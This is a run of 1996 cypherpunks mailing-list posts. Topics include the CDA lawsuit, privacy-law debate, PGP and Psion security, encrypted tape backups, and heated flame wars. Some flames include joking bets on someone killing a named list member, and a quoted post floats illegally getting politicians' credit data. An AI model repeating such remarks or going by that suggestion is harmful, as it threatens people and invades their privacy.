Message-ID: <2.2.32.19960208160834.0069f340@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09:21 PM 02/8/96 -0600, ecarp@netcom.com wrote:
>Why doesn't Perry just shut the hell up?  I've got more important things 
>to worry about than Perry's ignorant, fetid whining.  Such as that CDA 
>thing in the Telecommunications Bill.
>
>Anyone for suing Bill?

I am, if it will get you and Perry to stop sounding like a couple of 3-year-olds:

"He hit me first!"

"Did not!"

"Did too!"

"Did not!"

ad nauseum

Hell (that's my crypto-relevance: a clear violation of the CDA :-),
I've got two cats that get along better....

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRoC2sVrTvyYOzAZAQFUbAP/a3g+Ykd1nSQuWP1SYP7RayFEYnIBHBRX
yvcktG2iStZZ/bw7I59EBJPHVZDtMnx11ujl41wiK1V/49hoWyrHV5xUxcoId+c2
dSqM9yOKkVx8vdMuXxNEcHyVJRINryf+1xDVnCSDgtamKcWbbxWVnPGU4CvA/lq0
16TAZwXsxR4=
=vEeX
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"It is not the function of our Government to keep the citizen
from falling into error; it is the function of the citizen to
keep the Government from falling into error."
Robert H. Jackson (1892-1954), U.S. Judge
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geocities.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 9 Feb 1996 12:06:23 +0800
To: cypherpunks@toad.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
In-Reply-To: <199602081929.OAA28586@dal1820.computek.net>
Message-ID: <6BH1iD5w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ed Carp <erc@dal1820.computek.net> writes:
> > Ed, Let me make one thing about you perfectly clear.
> >
> > Plonk.
>
> "Plonk"?  What does that mean?  Does that mean you're going to hit me
> with something?  Sounds like another implied threat to me... ;)

This is the imaginary sound one makes when hitting the killfile.

(I wish I could run procmail on this box...)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tim Cook" <twcook@cts.com>
Date: Sat, 10 Feb 1996 23:29:07 +0800
To: cypherpunks@toad.com
Subject: CDA Yes Votes; Collection
Message-ID: <m0tkm39-000V3NC@mailhub.cts.com>
MIME-Version: 1.0
Content-Type: text/plain


Find out if yours ( or any ) representative or senator voted for the 
CDA.  Send me email with the subject CDA-YES.  Put their name and 
where they are from in the body. I'll compile the list and post it.
When this is over they'll wish they realized how powerful the 
internet REALLY is.

Besides, what makes the US Congress think they have any control over 
a worldwide network?

PS. Repost this msg where appropriate.  I'm only posting to 
cypherpunks.
Another "Logical Conclusion" by:
Tim Cook <twcook@cts.com>
Support THE US Constitution...
Vote Alexander in '96 and '00!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 10 Feb 1996 11:26:45 +0800
To: cypherpunks@toad.com
Subject: just repeating
Message-ID: <199602090312.WAA10037@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



In response to the several mail messages I got asking why I'd posted
my "robot" message here, I just want to say yet again that Ed Carp was
the one who forward it to cypherpunks. The mail headers in the
message, which I reproduce below, make this obvious.  The mail went
from me to Carp, with appropriate "for" portions of the Received:
headers indicating that the mail was destined for him, and somehow
mysteriously moved from Carp's machine to toad.com -- the only
possible source being Ed forwarding the thing since his name was all
over the previous hops. Don't blame me, folks.

Now, can we get back to cryptography?  Pretty-please?

Perry

Received: from toad.com by geech.gnu.ai.mit.edu (8.6.12/8.6.12GNU) with SMTP id UAA13412; Thu, 8 Feb 1996 20:41:19 -0500
Received: by toad.com id AA13518; Thu, 8 Feb 96 17:33:50 PST
Received: from dal1820.computek.net by toad.com id AA13512; Thu, 8 Feb 96 17:33:36 PST
Received: (from erc@localhost) by dal1820.computek.net (8.7/8.6.10) id UAA24985 for cypherpunks@toad.com; Thu, 8 Feb 1996 20:33:49 -0500
Received: by dal1820.computek.net (Linux Smail3.1.28.1 #52)
	id m0tkcB9-0009AzC; Thu, 8 Feb 96 14:38 EST
Received: from mail6.netcom.com (ecarp@mail6.netcom.com [192.100.81.142]) by dal1820.computek.net (8.7/8.6.10) with SMTP id OAA29375 for <erc@dal1820.computek.net>; Thu, 8 Feb 1996 14:38:49 -0500
Received: by mail6.netcom.com (8.6.12/Netcom)
	id LAA28210; Thu, 8 Feb 1996 11:37:54 -0800
Received: from jekyll.piermont.com by mail6 (8.6.12/Netcom)
	id LAA28165; Thu, 8 Feb 1996 11:37:44 -0800
Received: from localhost (perry@localhost) by jekyll.piermont.com (8.7.3/8.6.12) with SMTP id OAA08993 for <ecarp@netcom.com>; Thu, 8 Feb 1996 14:35:10 -0500 (EST)
Message-Id: <199602081935.OAA08993@jekyll.piermont.com>
X-Authentication-Warning: jekyll.piermont.com: Host perry@localhost didn't use HELO protocol
To: ecarp@netcom.com
From: "Perry's Mail Filter" <perry@piermont.com>
Subject: In Re: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
In-Reply-To: Your message of "Thu, 08 Feb 1996 13:29:41 CST."
             <199602081929.OAA28586@dal1820.computek.net> 
Date: Thu, 08 Feb 1996 14:35:10 -0500
Sender: owner-cypherpunks@toad.com
Precedence: bulk
X-UIDL: 823831065.014


I am sorry, but your message with the Subject:

	Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd) 

was rejected by Perry Metzger's mail filter and will not be read by
him. This is likely because Perry decided to place you on his reject
list. Perry tends to clean out his filter lists every six months, so
you may be able to send him electronic mail again sometime in the
future.

If you absolutely need to contact Perry, please use means other than
electronic mail, or ask a third party to contact him on your behalf.

You will not receive further copies of this notice.

Perry's Mail Filter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 10 Feb 1996 14:51:24 +0800
To: Frank Willoughby <frankw@in.net>
Subject: Re: Fair Credit Reporting Act and Privacy Act
Message-ID: <199602090618.WAA24283@ix13.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:25 AM 2/5/96 -0500, you wrote:
>Probably the easiest way of ensuring that personal information isn't 
>wantonly distributed by credit agencies or (anyone else) is to update 
>our Privacy Act - which is ridiculously out-of-date and badly in need of
>being re-written.  It is also hampered by its apparent lack of teeth.

The parts of the Privacy Act that I remember are all restrictions on
_government_ actions, not private actions.  It's an important distinction;
even though TRW may know way too much about you, it's all information that
you voluntarily released to somebody, unlike data that the government 
requires you to give them.  And, yes, it's out-of-date and toothless.

...
>If the Privacy Act were rewritten to be as strict as the BDSG, businesses
>would have a (mandatory) legal requirement to:
...
>o Ensure that databases are *not* being maintained which describe the
>   characteristics of individuals (buying habits, income, property 
>   ownership, etc) wantonly propagated by marketing (direct mail, 
>   telemarketing, etc) companies.  

If you're going to propose laws, you should not only think about
whether they'll do what you want, but also about what else they'll do,
how they'll be enforced, what are the side effects of that enforcement, etc.
How is the government going to ensure _non_existence of databases?
If I'm a prosecutor, and claim that you _might_ have personal data about
somebody on your machines beyond the Politically Correct Data Elements,
can I get a search warrant for _all_ your databases?  What about that
encrypted file on your PC at work?  Such things have been used to hold
personal data before (even by police like the LAPD or Stasi.)
No thanks.

If you want to require that a database exists, then a business can
demonstrate that they have it by producing it (though proving
whether or not in really includes all transactions is still difficult.)

On the other hand, if you don't make the law adequately enforceable,
you're encouraging violation and selective enforcement.

>o the promotion of the use & implementation of encryption - including
>   the possibility of ITAR being reduced or eliminated for the export
>   of encryption products

Yes!  GAKed encryption, to be sure - once there's a requirement that
you be able to produce your data for the government, they'll discover
that they need guaranteed access to data that would otherwise be guaranteed
inaccessible by strong encryption.

>o reduced propagation of personal information

A much stronger way to increase privacy is to eliminate one of the most
popular unique keys used by these databases - the Social Security Number
which the government requires you to give almost anybody who gives you money.
Give each taxpayer a pile of taxid numbers (either cryptographically related,
or just randomly generated and stored in a big tax-department database)
so you can use a different taxid for everyone who needs one, making it
impossible for anybody but the government to correlate them.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 9 Feb 1996 14:58:42 +0800
To: cypherpunks@toad.com
Subject: Re: Need a "warning" graphic of some kind for CDA
Message-ID: <199602090618.WAA24316@ix13.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


[This email rated FZ]


>Now that we all have web pages that are naughty and might be seen by 
>little children, I'd like to hve some kind of a graphic that can 
>universally be seen as a "Warning:  The following material is unsuitable 
>for children and close-minded twits".  (or words to that effect).

A Frank Zappa icon would be highly appropriate for that - I don't know how
his record publishers would feel about someone scanning it off an album cover
and retouching for the web, but you could probably work out something.
A Zappa IMG button with HREF to a copy of his album language rating label 
would seem very fitting.

        Before Bill Clinton signed the Exon Internet Censorship Bill,
                Tipper Gore brought you Music Censorship.
        Uncle Frank says "<quote here>"

I suppose it's a bit beyond Fair Use?


#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 10 Feb 1996 14:46:55 +0800
To: attila <attila@primenet.com>
Subject: Re: violating politicians privacy
Message-ID: <199602090618.WAA24333@ix13.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>	well, I take it as assumed correct that illegally violating the
>    credit and personal information of member os Congress (might as well 
>    include the Clintons and the Gores) would get a response on privacy.

_Is_ it violating their privacy to get their credit information?
After all, they're applying for some mighty big loans from everybody,
and putting everybody who pays US taxes down as a credit reference....

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 11 Feb 1996 12:06:36 +0800
To: Dave Roberts <djr@saa-cons.co.uk>
Subject: Re: Psion organisers
Message-ID: <199602090618.WAA24341@ix13.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:45 PM 2/2/96 +0000, Dave Roberts wrote:
>I was wondering about a couple of things regarding the Psion Series 3a 
>personal organisers.  (According to the manual, you have them in the USA 
>as well! :)
Not just in the manual, but in real life!  I hadn't thought about
the problems of bringing it through customs, though - yuk!
(I've more thought about Penn Jillette's proposal for an application
that does a Countdown to Detonation when you start up the machine,
just for the airport security people who want to be sure it's a real machine -
you could include audio :-)

>Firstly, anyone know what kind of encryption is done on documents and 
>spreadsheets held on it's internal disk?   It only allows a 10 character 
>password, and claims to encrypt the whole file.

I assume it's minimal, and unfortunately the encryption software I've
seen on the FTP sites for it has also been minimal (calling Enigma "minimal"
has a nice ring to it :-)  Porting RC4 shouldn't be too hard,
once I get the C support documentation.

The one genuine security application I have used it for has been S/Key;
typing in the challenge is a bit annoying (would be nice if the
application let you store previous challenges), but it works well.

Unlike the cool infrared communications Newtons can do between each other,
Psions have an audio-based communication that lets them squawk at each other.
I don't know how fast it is, since my machine doesn't have anyone to talk to
:-),
so I don't know if using it for digicash would be even vaguely practical.
(If it's 1200 bps, maybe - if it's 75 bps Baudot, probably not...)

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Sat, 10 Feb 1996 11:22:39 +0800
To: cypherpunks@toad.com
Subject: FWD: ACLU Lawsuit
Message-ID: <9602090342.AB14013@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


Excuse cross-post for those of you who are own both lists.  This from the
ACLU's New York office.



@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Date:          Thu, 8 Feb 1996 17:36:18 -0500
Subject:       To All Plaintiffs in Online Decency Lawsuit

To all Plaintiffs in the Online Decency Lawsuit:

This morning we filed the lawsuit in Philadelphia.  Judge Buckwalter,
to whom the lawsuit was assigned, held a hearing this afternoon on our
motion for a temporary restraining order to prohibit enforcement of
the Act.  The Government agreed at argument not to enforce the
"indecent" and "patently offensive" provisions of the Act for 7 days. 
We count this as a victory.

However, the Government did not agree not to eventually prosecute
for material available during the next 7 days.  Thus, we believe
there is still a risk.  With regard to the abortion provisions, the
Government conceded that they are unconstitutional and will not be
enforced.  We will not be satisfied on this matter until they so
stipulate in writing.  The Judge gave the Government until Wednesday
to respond in writing to our motion.  He will then rule on our
motion.

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

   ~ CYBER-RIGHTS ~
 ~=-=-=-=-=-=-=-=~=-=-=-=-=-=-=-=-=~-~=-=-=-=-=-=-=-=~=-=-=-=-=-=-=-=-
Visit The Cyber-Rights Library,  accessible via FTP or WWW at:

ftp://www.cpsr.org/cpsr/nii/cyber-rights/Library/
http://www.cpsr.org/cpsr/nii/cyber-rights/Library/

You are encouraged to forward and cross-post list traffic,
pursuant to any contained copyright & redistribution restrictions.
 ~=-=-=-=-=-=-=-=~=-=-=-=-=-=-=-=-=~-~=-=-=-=-=-=-=-=~=-=-=-=-=-=-=-=-








*******************************************************
Lynne L. Harrison, Esq.   |     "The key to life:
Poughkeepsie, New York    |      - Get up;
E-mail:                   |      - Survive;
lharrison@mhv.net         |      - Go to bed."
*******************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 10 Feb 1996 23:29:30 +0800
To: cypherpunks@toad.com
Subject: Re: In Re: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
In-Reply-To: <199602090303.WAA00539@dal1820.computek.net>
Message-ID: <i3i1iD11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ed Carp <erc@dal1820.computek.net> writes:
> > Mr. Carp, you've got extremely bad taste. Luckily, I don't have to
> > ever see anything you have to say ever again.
>
> Why, thank you, Perry!  I'll be sure to mention the fact that you think I
> have bad ... excuse me, "extremely bad taste" in my next performance
> review.  I'm sure it will affect the outcome immeasurably. ;)

I see we're into cannibalism now...
 "I don't like your chief."
 "If you don't like him, don't eat him."

I envy Perry and wish I had procmail for (DOS) Waffle.

One of the many things that I dislike about Americans is their pronounced
tendency to express pride in their ignorance; as in, "I've never heard of
X's work, and I'm proud of it!". Now, that's tasteless.

The crypto relevance of the above remark is that this mailing list appears
to have been invaded by non-technical people who don't know anything about
cryptography beyond what they may have read in Schneier, who don't write code,
and who contribute nothing but childish flames and censorship attempts.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 10 Feb 1996 14:45:48 +0800
To: cypherpunks@toad.com
Subject: Re: Tell me whats wrong with this
Message-ID: <199602090646.WAA29149@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  4:37 PM 2/8/96 -0800, Timothy C. May wrote:
>First, most televisions and VCRs are currently equipped with the
>"O-Switch," which parents have long been using to turn content on and off.

I agree strongly with Tim on this one.  The one time the OFF switch didn't
work for me with my sons, (the disagreement was about quantity, not
content), I used wire cutters on the cable.  Very effective. 

Bill

-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson, P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Sat, 10 Feb 1996 11:15:15 +0800
To: cypherpunks@toad.com
Subject: Top this one
Message-ID: <960208225252.2021859a@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain



>Hell, UNC had its entire comms room taken out by a steam pipe breaking 
>caused by a water main bursting. Haven't there been any advances in 
>technology since the 40s?

At a place I worked once upon a time, long, long ago. We had an "advanced
projects laboratory" which was considered essential. It had its own
mains power drop, a massive diesel generator, and a room full of lead-acid
batteries for redundant backup in case the diesel didn't start.

Dump truck lost its brakes, hit a power pole which fell on the generator 
shed, crushing the roof onto the diesel, incidently rupturing the coolant/
water pipes which flooded the adjacent battery room (batteries were in a 
well to contain the acid if it leaked. Well filled.)

							P.fla




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.org (Ulf Moeller)
Date: Fri, 9 Feb 1996 07:18:35 +0800
To: cypherpunks@toad.com
Subject: Re: Report available: "Minimal Key Lengths for Symmetric Ciphers"
Message-ID: <m0tkeGx-00009aC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


>Anyone who listens to crypto advice from people who's purpose in life
>is to listen to *YOU* gets what they deserve. I'll stay with PGP which
>has a 2048 bit key.

ROTFL. Last time I checked, it was 128 bits. BTW, do you know what
"minimal" means?

-- 
Ulf Mvller   *   E-Mail: <um@c2.org>   *   WWW: http://www.c2.org/~um/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 10 Feb 1996 23:27:40 +0800
To: cypherpunks@toad.com
Subject: Re: Perry's whining
In-Reply-To: <199602090321.WAA02247@dal1820.computek.net>
Message-ID: <2BJ1iD12w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ed Carp <erc@dal1820.computek.net> writes:

> Why doesn't Perry just shut the hell up?

I wonder if any Russian speakers on this list know a good English
equivalent of the Russian expression: "Whose cow should moo"?

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mch@squirrel.com (Mark C. Henderson)
Date: Sat, 10 Feb 1996 14:49:06 +0800
To: Alan Olsen <cypherpunks@toad.com
Subject: Re: Encryption and Backups
Message-ID: <199602090713.XAA08209@squirrel.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 4, 14:13, Alan Olsen wrote:
} Subject: Encryption and Backups
} Something that I have not seen addressed is the need for strong encryption
} in backup software.
} 
} Most backup software has an "encryption" option, but I have seen few that
} have anything resembling strong encryption.  Furthermore, I have seen no
} real push for strong encryption for backups at all.

GNU tar is not the commercial backup solution many folks will be 
looking for, but it works, and has nice built-in hooks which are 
intended to call a compression program. 

One can also use these options to call an encryption program, as long 
as the encryption program takes stdin as input, stdout as output, 
encrypts by default, and decrypts when given the -d option. 

e.g. if the encryption program happens to be called /usr/local/bin/mg,
something like

gtar --use-compress-program /usr/local/bin/mg --block-compress -b 96 -cvf /dev/rst0 directory

will backup "directory" to tape in encrypted form under Sun OS 4.1.3

It also has support for incrementals, etc.


-- 
Mark Henderson -- markh@wimsey.bc.ca, henderso@netcom.com, mch@squirrel.com
PGP 1024/C58015E3 fingerprint=21 F6 AF 2B 6A 8A 0B E1 A1 2A 2A 06 4A D5 92 46
cryptography archive maintainer  --  ftp://ftp.wimsey.com/pub/crypto
ftp://ftp.wimsey.com/pub/crypto/sun-stuff/change-sun-hostid-1.6.2.tar.gz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Fri, 9 Feb 1996 15:48:04 +0800
To: Tim Philp <frissell@panix.com>
Subject: Re: Fair Credit Reporting Act and Privacy Act
Message-ID: <199602090726.XAA27422@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 5 Feb 1996, Duncan Frissell wrote:
>> Unfortunately, [a privacy act] would also:
>> 
>> *  Require government registration of computers and databases containing
>> information about people (whether these computers are used by business or
>> individuals).  This eases regulation of computers and future confiscation.

At 07:04 PM 2/5/96 -0500, Tim Philp wrote:
>I don't believe that this follows at all. All that would be required 
>would be a statutory obligation to comply with the legislation.

And how can you enforce this statutory obligation?  Privacy laws 
against private citizens run into the same problem as drug laws:  
You need intrusive means to enforce them.

A law "protecting" privacy would require government supervision 
of what is on my computer and your computer.  

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 9 Feb 1996 16:28:11 +0800
To: Laszlo Vecsey <master@internexus.net>
Subject: Re: DSN
Message-ID: <199602090803.AAA00707@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:47 AM 2/1/96 -0500, you wrote:
>Anyone heard of DSN? I think thats the right order of the initials...
>... its supposedly the only crypto-hardware solution for protecting an 
>entire network on the Internet. You put one of these $5,000 units at one 
>end of a lan, and another one somewhere else on the Internet, and the 
>company gaurantees secure, encrypted transmissions. The TCP/IP headers 
>and data are mangled, encrypted, etc.

Anybody who supposedly makes the "only [whatever-category] hardware solution"
for a problem has either not done their literature searching, is going for
a really obscure market niche, doesn't understand the problem, or
(very rarely) is the first product out on the bleeding edge, or has
had their competitors go out of business on them.  VSLAN (I forget the 
manufacturer) used to make an encrypting Ethernet board for PCs, Suns, etc.,
and did the software work behind it to get a B2 Red Book rating from the NSA.
Boeing had a secure FDDI ring about the same time (~5 years ago.)
Motorola has made several products for encrypting Ethernets, X.25s, and
other networks, which the military buys and likes.  Don't know which of
these are still on the market, and what new toys have appeared.

Meanwhile, the swIPe encrypted/authenticated IP protocol is available,
and the similar IPng security protocols are emerging (i.e. the RFCs are
written and folks are working on reference implementations.)
They'll cost you $0 for software plus a 386-box for Linux, or a used Sun.

>It uses 512bit keys and I was just wondering how the authentication is
>done. Does anyone have any specs on these units? Supposedly it does not
>require a 3rd party entity to verify that the two units are both valid,
>when determining the initial public/key pairs. Perhaps there is hardcoded
>data in the units that is used to verify this? The company supposedly has 
>some proprierty method ... how can we be sure this expensive unit can do 
>its job if information on the encryption has not been released. 

If you can't get the company to show you the protocols, at least under
non-disclosure, ask them if it's NSA-certified and see what the NSA has to say
about it.  512-bit keys seem a bit short for either RSA or Diffie-Hellman
these days...

>[RSA in 5 lines of Scheme, deleted.]
Got any short prime-number generators?
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 9 Feb 1996 16:28:01 +0800
To: cypherpunks@toad.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
Message-ID: <199602090803.AAA00727@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:45 PM 2/8/96 -0500, Perry wrote:

>You are annoying me. How much do people want to bet someone kills 
>Jim Bell in the next six months?

6 cypherbucks, if I can get the ecash software to work again.
12, if you'll accept killfiling as well...

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <dm@amsterdam.lcs.mit.edu>
Date: Fri, 9 Feb 1996 13:50:29 +0800
To: cmca@alpha.c2.org (Chris McAuliffe)
Subject: Re: PGP's "only for your eyes"
In-Reply-To: <199602062336.PAA24566@infinity.c2.org>
Message-ID: <199602090532.AAA26688@amsterdam.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <199602062336.PAA24566@infinity.c2.org> cmca@alpha.c2.org (Chris McAuliffe) writes:

> 	Maybe some of you already know about this.
> 
> 	Whe reading PGP's "Only for your eyes" messages, the program
> 	creates a temporary file containing the plaintext in the
> 	directory where the cyphertext file is.
> 
> 	So, don't worry about this option, it's quite useless.
> 
> The manual points out that you shouldn't rely on it. Its main purpose is
> simply to prevent accidentally or automatically leaving the plaintext
> lying around, not to actually securely guarantee that behaviour. After
> all, you could always cut-and-paste the text, or (since you have the PGP
> source) alter PGP to ignore the flag.

I've gotten burned by this because it created a temp file over NFS.
If I'd been able to read the message with my mail reader "pgp -f", I
would not have disclosed the information.  The for your eyes only
option is more than useless, it's dangerous.

> The real problem is not what it does, but what people *think* it might
> do.
> 
> I take that back. When I check the manual, it doesn't say that it is
> insecure. It really ought to. At least one of the books about PGP does
> though, I know I've read it somewhere other than email.

David




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 10 Feb 1996 23:27:33 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: The wisdom of Mark Twain
Message-ID: <199602090532.AAA07658@homeport.org>
MIME-Version: 1.0
Content-Type: text


Better to keep silent and be thought a fool than to open ones mouth
and remove any doubt.

ObCypherpunk:
	Mark Twain was a pseudonym.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Sat, 10 Feb 1996 06:10:18 +0800
To: perry@piermont.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
Message-ID: <v0153050bad40a7947a56@[206.138.116.128]>
MIME-Version: 1.0
Content-Type: text/plain


>jim bell writes:
>> >This has gone off into political theory. Could we take it to private
>> >mail or some such?
>>
>> Apparently, other people are just as unhappy with your attempts to act as
>> "moderator" of this list.  Wake up!  Freedom is on the line.
>
>You are annoying me. How much do people want to bet someone kills
>Jim Bell in the next six mont

You are annoying _everyone_!  How much you want to bet someone kills _you_
in the next month?

lunaslide

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Fri, 9 Feb 1996 17:26:39 +0800
To: avatar@mindspring.com
Subject: Re: Tell me whats wrong with this
Message-ID: <v0153050cad40ac339043@[206.138.116.128]>
MIME-Version: 1.0
Content-Type: text/plain


>Tell me whats wrong with this section of the telecom bill.  I have a six
>year old boy I am trying to raise
>and it is hard enough to teach him respect and values without explaining why
>Ned Beatty is being
>bungholed in the woods by Billy Bob or why the Terminator splattered this
>guys brains all over the
>wall.
>        Tell me why parents should not be able to censor their OWN
>television so that they may raise their children the way THEY see
>fit...................Did your dad give you his old
>playboys?.........NOOOOO............

<snip>

A note here...my dad also did not go to jail for two years and get fined
$100,000 when I weasled my way into his closet, without his knowledge, and
found his Playboys at age five!

>All I'm saying is it's tough to raise a child these days without the added
>distortion of modern
>programing and parents need not be denied any tool that can help them
>achieve success.

<rm for brevity>

I didn't see anything really wrong with that part of the bill.  What it
will encourage is advertisers to withdraw from the more violent shows, and
in turn will encourage television producers to prefer funding less violent
shows.  Since I don't watch television that often anyhow, it won't affect
me very much.

I do see where it will deny those who wish to see such shows the violence
they wish to see.  This is an issue, and it is indirectly caused by the
bill, but it can not be used effectively against the govt. because they did
not directly outlaw violence.

It is particularly the CDA which boils my blood.  One other concern,
however, is that the lifting of restrictions on who can compete for what
will result in mergers and buyouts of internet providers and that when only
a few major companies own the bulk of the industry, the consumers will
suffer from content restriction, technological lag and possibly price
gouging.  I note the car, oil, software and media industries as a few
examples.  For example, journalists have traditionally been in support of
free speech and civil rights; they are, for the most part, rather liberal.
However, they, particularly those in television journalism, have been
notably absent in this battle over net censorship and have definitely not
been there to support us.  In fact, they have even spoken to our cause's
detriment on many occasions, by the slant of their pieces!  I can only
attribute this logically to the fact that the internet takes attention away
from their industry.  The internet competes with television and print as an
information source, and this the owners of the media do not want.  It's
sort of an unspoken conspiricy (appologies, I've already been accused of
turning this into ConspiricyPunks once before:-)

Nontheless, those are some of my concerns over the telcom bill aside from
the obvious CDA.

lunaslide

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Sat, 10 Feb 1996 06:08:56 +0800
To: jml216@psu.edu
Subject: Re: Mailing list
Message-ID: <v0153050dad40b3323508@[206.138.116.128]>
MIME-Version: 1.0
Content-Type: text/plain


>When I wrote:
>>   Please make me apart of your mailing list.
>I meant:
>    Please take me apart on your mailing list.
>Thanks, Jack.

POOF!  Your wish has been granted :-)

lunaslide

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Sat, 10 Feb 1996 06:13:19 +0800
To: avatar@mindspring.com
Subject: Re: Tell me whats wrong with this
Message-ID: <v0153050ead40b57fbf7d@[206.138.116.128]>
MIME-Version: 1.0
Content-Type: text/plain


avitar wrote:

>You probably had no problem with seat belts being manditory eqiupment ,
>because they
>protected YOU and the people YOU cared about.
>You probably had no problem with manditory airbags, public building smoke
>alarms, unleaded
>fuel, restaurant health codes,etc....Because they protected you and or
